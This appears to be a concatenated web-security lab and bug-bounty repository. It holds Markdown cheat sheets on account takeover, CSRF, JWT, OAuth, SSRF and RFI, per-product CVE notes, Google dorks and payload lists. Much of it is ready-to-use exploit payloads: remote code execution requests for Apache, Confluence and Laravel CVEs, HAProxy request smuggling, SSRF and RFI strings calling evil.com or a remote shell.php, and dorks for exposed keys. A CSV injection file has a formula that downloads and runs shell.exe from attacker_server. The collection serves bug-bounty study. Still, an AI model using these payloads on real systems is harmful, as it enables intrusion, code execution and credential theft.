email, try signup again but using different password 20 | ``` 21 | POST /newaccount HTTP/1.1 22 | ... 23 | email=victim@mail.com&password=hacked 24 | ``` 25 | 26 | 3. via CSRF 27 | - Create an account as an attacker and fill all the form, check your info in the Account Detail. 28 | - Change the email and capture the request, then created a CSRF Exploit. 29 | - The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account. 30 | 31 | ```html 32 | 33 | 34 |
35 | 36 | 37 |
38 | 39 | 40 | ``` 41 | 42 | 4. Chaining with IDOR, for example 43 | ``` 44 | POST /changepassword.php HTTP/1.1 45 | Host: site.com 46 | ... 47 | userid=500&password=heked123 48 | ``` 49 | 500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID 50 | 51 | 5. No Rate Limit on 2FA 52 | 53 | References: 54 | - [Pre-Account Takeover using OAuth Misconfiguration](https://vijetareigns.medium.com/pre-account-takeover-using-oauth-misconfiguration-ebd32b80f3d3) 55 | - [Account Takeover via CSRF](https://medium.com/bugbountywriteup/account-takeover-via-csrf-78add8c99526) 56 | - [How re-signing up for an account lead to account takeover](https://zseano.medium.com/how-re-signing-up-for-an-account-lead-to-account-takeover-3a63a628fd9f) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Broken Link Hijacking.md: -------------------------------------------------------------------------------- 1 | # Broken Link Hijacking 2 | 3 | ## Introduction 4 | Broken Link Hijacking exists whenever a target links to an expired domain or page 5 | 6 | ## How to find 7 | 1. Manually find external links on the target site (For example, check some links to social media accounts) 8 | 2. Try using tools to find broken link, for example using tools that listed in this readme 9 | 10 | ## Tools 11 | - [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) 12 | - [Check My Links](https://chrome.google.com/webstore/detail/check-my-links/ojkcdipcgfaekbeaelaapakgnjflfglf/related) 13 | 14 | ## References 15 | - [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) 16 | - [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d) 17 | - [Hackerone #1466889](https://hackerone.com/reports/1466889) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Default Credentials: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/CompleteBugBounty/Misc/Default Credentials -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Email Spoofing.md: -------------------------------------------------------------------------------- 1 | # Email Spoofing 2 | 3 | ## Introduction 4 | Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value. 5 | 6 | ## How to detect 7 | 1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing 8 | ``` 9 | v=spf1 include:_spf.google.com ~all 10 | ``` 11 | 2. Check the DMARC records, if the website don't have a DMARC record or the value of tag policy is `none`, the website must be vulnerable to email spoofing 12 | ``` 13 | v=DMARC1; p=none; rua=mailto:dmarc@yourdomain.com 14 | ``` 15 | 16 | Reference: 17 | - [Hackerone #1071521](https://hackerone.com/reports/1071521) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Exposed API keys.md: -------------------------------------------------------------------------------- 1 | # Exposed API Keys / Token OAuth 2 | 3 | ## Introduction 4 | Sometimes in a web application, an attacker can find some exposed API keys / token which can lead to financial loss to a company. 5 | 6 | ## How to find 7 | 1. Find API keys / token by looking at the JavaScript code on the website 8 | 2. Find API keys / token by checking the request / response header 9 | 10 | ## Tools 11 | * [Key-Checker](https://github.com/daffainfo/Key-Checker) 12 | 13 | # References 14 | * [keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys 15 | * [all-about-apikey](https://github.com/daffainfo/all-about-apikey) is a repository of detailed information about API Key / Oauth tokens. The repository contain description API key, HTTP request, the response if the API key is valid / no, regex, and the example -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/JWT Vulnerabilities.md: -------------------------------------------------------------------------------- 1 | # JWT Vulnerabilities 2 | 3 | ## Introduction 4 | JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. 5 | 6 | ## How to exploit 7 | 1. Modify the algorithm to "none" algorithm 8 | ``` 9 | { 10 | "alg": "none", 11 | "typ": "JWT" 12 | } 13 | ``` 14 | 2. Modify the algorithm RS256 to HS256 15 | 16 | If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature. 17 | 18 | 3. Bruteforce HS256 19 | 20 | the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code. 21 | 22 | ## Tools 23 | * [jwt-hack](https://github.com/hahwul/jwt-hack) 24 | 25 | ## Reference 26 | - [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) -------------------------------------------------------------------------------- /CompleteBugBounty/Misc/Tabnabbing.md: -------------------------------------------------------------------------------- 1 | # Tabnabbing 2 | 3 | ## Introduction 4 | When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property. 5 | 6 | ## How to find 7 | ```html 8 | 9 | 10 | 11 | ``` 12 | 13 | ## How to Exploit 14 | 1. Attacker posts a link to a website under his control that contains the following JS code: 15 | ```html 16 | 17 | 21 | 22 | ``` 23 | 2. He tricks the victim into visiting the link, which is opened in the browser in a new tab. 24 | 3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website. 25 | 26 | ## References 27 | * [Hackerone #260278](https://hackerone.com/reports/260278) -------------------------------------------------------------------------------- /CompleteBugBounty/OAuth Misconfiguration.md: -------------------------------------------------------------------------------- 1 | # OAuth Misconfiguration 2 | 3 | ## Introduction 4 | The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account. 5 | 6 | ## Where to find 7 | In the SSO feature. For example `Log in with google` or `Log in with facebook`. 8 | 9 | ## How to exploit 10 | 1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses). 11 | 2. Change Referral header to attacker.com while requesting OAuth. 12 | 3. Create an account with victim@gmail.com with normal functionality. Create account with victim@gmail.com using OAuth functionality. Now try to login using previous credentials. 13 | 4. OAuth Token Re-use. 14 | 5. Missing or broken state parameter. 15 | 6. Lack of origin check. 16 | 7. Open Redirection on another endpoint > Use it in redirect_uri 17 | 8. If there is an email parameter after signin then try to change the email parameter to victim's one. 18 | 9. Try to remove email from the scope and add victim's email manually. 19 | 10. Only company's email is allowed? > Try to replace hd=company.com to hd=gmail.com 20 | 11. Check if its leaking client_secret parameter. 21 | 12. Go to the browser history and check if the token is there. 22 | 23 | ## References 24 | * [tuhin1729_](https://twitter.com/tuhin1729_/status/1417843523177484292) 25 | * [c0d3x27](https://infosecwriteups.com/the-oauth-misconfiguration-15e66dd19a6e) -------------------------------------------------------------------------------- /CompleteBugBounty/Reconnaissance/Google Dorks.md: -------------------------------------------------------------------------------- 1 | # Google Dorks 2 | ## List 3 | - inurl:example.com intitle:"index of" 4 | - inurl:example.com intitle:"index of /" "*key.pem" 5 | - inurl:example.com ext:log 6 | - inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv 7 | - inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git 8 | - inurl:example.com intitle:"index of" "config.db" 9 | - inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml 10 | - inurl:example.com intext:admin ext:sql inurl:admin 11 | - inurl:example.com allintext:username,password filetype:log 12 | site:example.com "-----BEGIN RSA PRIVATE KEY-----" - inurl:id_rsa 13 | - site:codepad.co "keyword" 14 | - site:scribd.com "keyword" 15 | - site:npmjs.com "keyword" 16 | - site:npm-runkit.com "keyword" 17 | - site:libraries.io "keyword" 18 | - site:ycombinator.io "keyword" 19 | - site:coggle.it "keyword" 20 | - site:papaly.com "keyword" 21 | - site:google.com "keyword" 22 | - site:trello.com "keyword" 23 | - site:prezi.com "keyword" 24 | - site:jsdelivr.net "keyword" 25 | - site:codepen.io "keyword" 26 | - site:codeshare.io "keyword" 27 | - site:sharecode.io "keyword" 28 | - site:pastebin.com "keyword" 29 | - site:repl.it "keyword" 30 | - site:productforums.google.com "keyword" 31 | - site:gitter.im "keyword" 32 | - site:bitbucket.org "keyword" 33 | - site:*atlassian.net "keyword" 34 | - inurl:gitlab "keyword" 35 | - inurl:github "keyword" -------------------------------------------------------------------------------- /CompleteBugBounty/Remote File Inclusion.md: -------------------------------------------------------------------------------- 1 | ## Remote File Inclusion (RFI) 2 | 3 | ## Introduction 4 | Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. 5 | 6 | ## Where to find 7 | - Any endpoint that includes a file from a web server. For example, `/index.php?page=index.html` 8 | 9 | ## How to exploit 10 | 1. Basic payload 11 | ``` 12 | http://example.com/index.php?page=http://daffa.info/shell.php 13 | ``` 14 | 15 | 2. URL encoding 16 | ``` 17 | http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php 18 | ``` 19 | 20 | 3. Double encoding 21 | ``` 22 | http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php 23 | ``` 24 | 25 | 4. Using Null Byte (%00) 26 | ``` 27 | http://example.com/index.php?page=http://daffa.info/shell.php%00 28 | ``` 29 | 30 | ## References 31 | * [payloadbox](https://github.com/payloadbox/rfi-lfi-payload-list) -------------------------------------------------------------------------------- /CompleteBugBounty/SQL Injection.md: -------------------------------------------------------------------------------- 1 | # Soon! -------------------------------------------------------------------------------- /CompleteBugBounty/Server Side Request Forgery.md: -------------------------------------------------------------------------------- 1 | # Server Side Request Forgery (SSRF) 2 | 3 | ## Introduction 4 | Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server 5 | 6 | ## Where to find 7 | Usually it can be found in the request that contain request to another url, for example like this 8 | ``` 9 | POST /api/check/products HTTP/1.1 10 | Host: example.com 11 | Content-Type: application/x-www-form-urlencoded 12 | Origin: https://example.com 13 | Referer: https://example.com 14 | 15 | urlApi=http://192.168.1.1%2fapi%2f&id=1 16 | ``` 17 | 18 | or 19 | 20 | ``` 21 | GET /image?url=http://192.168.1.1/ 22 | Host: example.com 23 | ``` 24 | 25 | ## How to exploit 26 | 1. Basic payload 27 | ``` 28 | http://127.0.0.1:1337 29 | http://localhost:1337 30 | ``` 31 | 32 | 2. Hex encoding 33 | ``` 34 | http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1 35 | ``` 36 | 37 | 3. Octal encoding 38 | ``` 39 | http://127.0.0.1 -> http://0177.0.0.01 40 | ``` 41 | 42 | 4. Dword encoding 43 | ``` 44 | http://127.0.0.1 -> http://2130706433 45 | ``` 46 | 47 | 5. Mixed encoding 48 | ``` 49 | http://127.0.0.1 -> http://0177.0.0.0x1 50 | ``` 51 | 52 | 6. Using URL encoding 53 | ``` 54 | http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74 55 | ``` 56 | 57 | 7. Using IPv6 58 | ``` 59 | http://0000::1:1337/ 60 | http://[::]:1337/ 61 | ``` 62 | 63 | 8. Using bubble text 64 | ``` 65 | http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ 66 | 67 | Use this https://capitalizemytitle.com/bubble-text-generator/ 68 | ``` 69 | 70 | ## How to exploit (URI Scheme) 71 | 1. File scheme 72 | ``` 73 | file:///etc/passwd 74 | ``` 75 | 76 | 2. Dict scheme 77 | ``` 78 | dict://127.0.0.1:1337/ 79 | ``` 80 | 81 | 3. FTP scheme 82 | ``` 83 | ftp://127.0.0.1/ 84 | ``` 85 | 86 | 4. TFTP scheme 87 | ``` 88 | tftp://evil.com:1337/test 89 | ``` 90 | 91 | 5. SFTP scheme 92 | ``` 93 | sftp://evil.com:1337/test 94 | ``` 95 | 96 | 6. LDAP scheme 97 | ``` 98 | ldap://127.0.0.1:1337/ 99 | ``` 100 | 101 | 7. Gopher scheme 102 | ``` 103 | gopher://evil.com/_Test%0ASSRF 104 | ``` 105 | ## References 106 | * [Vickie Li](https://vickieli.medium.com/bypassing-ssrf-protection-e111ae70727b) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Apache HTTP Server.md: -------------------------------------------------------------------------------- 1 | # Apache (HTTP Server) Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Apache (HTTP Server)? 5 | 6 | ## How to Detect 7 | Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page 8 | 9 | 1. Find the related CVE by checking Apache (HTTP Server) version 10 | * How to find the Apache (HTTP Server) version 11 | 12 | By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html) 13 | 14 | Some example CVE: 15 | 16 | - CVE-2021-41773 (RCE and LFI) 17 | ``` 18 | POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 19 | Host: 127.0.0.1:8080 20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 21 | Accept: */* 22 | Content-Length: 7 23 | Content-Type: application/x-www-form-urlencoded 24 | Connection: close 25 | 26 | echo;id 27 | ``` 28 | - CVE-2021-42013 (RCE and LFI) 29 | ``` 30 | POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 31 | Host: 127.0.0.1:8080 32 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 34 | Accept-Language: en-US,en;q=0.5 35 | Accept-Encoding: gzip, deflate 36 | Connection: close 37 | Upgrade-Insecure-Requests: 1 38 | Content-Type: application/x-www-form-urlencoded 39 | Content-Length: 7 40 | 41 | echo;id 42 | ``` -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Confluence.md: -------------------------------------------------------------------------------- 1 | # Confluence Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Confluence? 5 | 6 | ## How to Detect 7 | Try to HTTP request to `https://example.com/login.action?os_destination=%2F` and there is a form login 8 | 9 | 1. Find the related CVE by checking Confluence version 10 | * How to find the Confluence version 11 | 12 | Try to request to `https://example.com/login.action?os_destination=%2F` and then check the source code. You will find this line `` so 8.20.9 is the Confluence version. If you found outdated Confluence version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-6258/Atlassian-Confluence.html) 13 | 14 | Some example CVE: 15 | 16 | - CVE-2022-26134 (Remote Code Execution) 17 | ``` 18 | https://example.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ 19 | ``` 20 | 21 | - CVE-2021-26085 (Arbitrary File Read) 22 | ``` 23 | https://example.com/s/test/_/;/WEB-INF/web.xml 24 | ``` -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/HAProxy.md: -------------------------------------------------------------------------------- 1 | # HAProxy Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses HAProxy? 5 | 6 | ## How to Detect 7 | `-` 8 | 9 | 1. CVE-2021-40346 (HTTP Request Smuggling) 10 | ``` 11 | POST /index.html HTTP/1.1 12 | Host: abc.com 13 | Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: 14 | Content-Length: 60 15 | 16 | GET /admin/add_user.py HTTP/1.1 17 | Host: abc.com 18 | abc: xyz 19 | ``` 20 | 21 | Source: 22 | - [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Joomla.md: -------------------------------------------------------------------------------- 1 | # Grafana 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Joomla ? 5 | 6 | ## How to Detect 7 | Try to HTTP request to `https://example.com/` and if you see the source code, you will see something like this `` 8 | 9 | 1. Find the related CVE by checking the core, plugins, and theme version 10 | * How to find the joomla version 11 | ``` 12 | https://target.com/administrator/manifests/files/joomla.xml 13 | ``` 14 | 15 | * How to find the joomla plugin version 16 | ``` 17 | https://target.com/administrator/components/com_NAMEPLUGIN/NAMEPLUGIN.xml 18 | 19 | for example 20 | 21 | https://target.com/administrator/components/com_contact/contact.xml 22 | ``` 23 | 24 | > or change NAMEPLUGIN.xml to `changelog.txt` or `readme.md` or `readme.txt` 25 | 26 | * How to find the theme version 27 | ``` 28 | https://target.com/wp-content/themes/THEMENAME/style.css 29 | https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file) 30 | ``` 31 | If you found outdated core / plugins, find the exploit at https://exploit-db.com 32 | 33 | 2. Joomla! Config Dist File 34 | ``` 35 | https://example.com/configuration.php-dist 36 | ``` 37 | 3. Database File List 38 | ``` 39 | https://example.com/libraries/joomla/database/ 40 | ``` 41 | 42 | ## References 43 | - [Exploit-db #6377](https://www.exploit-db.com/ghdb/6377) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Laravel.md: -------------------------------------------------------------------------------- 1 | # Laravel Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Laravel? 5 | 6 | ## How to Detect 7 | Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=` 8 | 9 | 1. Find the related CVE by checking laravel version 10 | * How to find the laravel version 11 | 12 | By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html) 13 | 14 | Some example CVE: 15 | 16 | - CVE-2021-3129 (Remote Code Execution) 17 | ``` 18 | POST /_ignition/execute-solution HTTP/1.1 19 | Host: example.com 20 | Accept: application/json 21 | Content-Type: application/json 22 | 23 | {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}} 24 | ``` 25 | 26 | 2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841) 27 | ``` 28 | curl -d "" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 29 | ``` 30 | 31 | 3. Exposed environment variables 32 | * Full Path Exploit : http://example.com/.env 33 | 34 | ![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png) 35 | 36 | 4. Exposed log files 37 | * Full Path Exploit : http://example.com/storage/logs/laravel.log 38 | 39 | 5. Laravel Debug Mode Enabled 40 | * Try to request to https://example.com using POST method (Error 405) 41 | * Using [] in paramater (ex:example.com/param[]=0) 42 | 43 | ![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png) 44 | 45 | ## References 46 | * [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html) 47 | -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Moodle.md: -------------------------------------------------------------------------------- 1 | # Moodle Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Moodle? 5 | 6 | ## How to Detect 7 | If you visit `https://target.com` and see the source code, you will see `//evil.com 45 | https://example.com/\/\/evil.com/ 46 | https://example.com/\/evil.com 47 | https://example.com/\evil.com 48 | https://example.com/evil.com 49 | https://example.com/evil.com/%2F.. 50 | https://example.com/evil.com/ 51 | https://example.com/evil.com/..;/css 52 | https://example.com/https:evil.com 53 | ``` 54 | 55 | 4. Nginx status page 56 | ``` 57 | https://example.com/nginx_status 58 | ``` 59 | 60 | ## References 61 | - [Detectify](https://blog.detectify.com/2020/11/10/common-nginx-misconfigurations/) -------------------------------------------------------------------------------- /CompleteBugBounty/Technologies/Zend.md: -------------------------------------------------------------------------------- 1 | # Zend Common Bugs 2 | 3 | ## Introduction 4 | What would you do if you came across a website that uses Zend? 5 | 6 | ## How to Detect 7 | `-` 8 | 9 | 1. Finding config files 10 | ``` 11 | https://target.com/application/configs/application.ini 12 | https://target.com/admin/configs/application.ini 13 | ``` -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Paul Veillard, P. Eng 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Web Application Security Labs 2 | 3 | An ongoing & curated collection of awesome software best practices and techniques, libraries and frameworks, E-books and videos, websites, blog posts, links to github Repositories, technical guidelines and important resources about Web Application Security Labs in Cybersecurity. 4 | > Thanks to all contributors, you're awesome and wouldn't be possible without you! Our goal is to build a categorized community-driven collection of very well-known resources 5 | 6 | 7 | 8 | https://portswigger.net/web-security/all-labs 9 | -------------------------------------------------------------------------------- /cross-site-request-forgery/xss-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 İsmail Taşdelen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /cross-site-scripting/xss-payload-list/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 İsmail Taşdelen 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /csv-injection/csv-injection-payloads/Intruder/csv-payload.txt: -------------------------------------------------------------------------------- 1 | DDE ("cmd";"/C calc";"!A0")A0 2 | @SUM(1+9)*cmd|' /C calc'!A0 3 | =10+20+cmd|' /C calc'!A0 4 | =cmd|' /C notepad'!'A1' 5 | =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 6 | =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 -------------------------------------------------------------------------------- /csv-injection/csv-injection-payloads/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Payload Box 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /csv-injection/csv-injection-payloads/README.md: -------------------------------------------------------------------------------- 1 | ## CSV Injection Payloads 2 | 3 | 4 | 5 | CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. 6 | 7 | #### Payloads : 8 | 9 | ``` 10 | DDE ("cmd";"/C calc";"!A0")A0 11 | @SUM(1+9)*cmd|' /C calc'!A0 12 | =10+20+cmd|' /C calc'!A0 13 | =cmd|' /C notepad'!'A1' 14 | =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 15 | =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 16 | ``` 17 | 18 | #### References : 19 | 20 | ###### CSV Injection : 21 | 22 | * 👉 https://owasp.org/www-community/attacks/CSV_Injection 23 | 24 | ##### Cloning an Existing Repository ( Clone with HTTPS ) 25 | ``` 26 | root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git 27 | ``` 28 | 29 | ##### Cloning an Existing Repository ( Clone with SSH ) 30 | ``` 31 | root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git 32 | ``` 33 | 34 | #### Donate! 35 | 36 | Support the authors: 37 | 38 | #### LiberaPay: 39 | 40 | 41 | -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/default/big-1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/directory-traversal/directory-payload-list/Intruder/default/big-1.txt -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/default/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/paulveillard/cybersecurity-web-application-labs/9b6b4484b7ff743b0d54fb296ce0fb3a454ddd27/directory-traversal/directory-payload-list/Intruder/default/big.txt -------------------------------------------------------------------------------- /directory-traversal/directory-payload-list/Intruder/joomla/joomla_themes.fuzz.txt: -------------------------------------------------------------------------------- 1 | templates/abc/ 2 | templates/atomic/ 3 | templates/b59-tpl8/ 4 | templates/beez/ 5 | templates/carbon_07/ 6 | templates/crub/ 7 | templates/dm_arrow_red/ 8 | 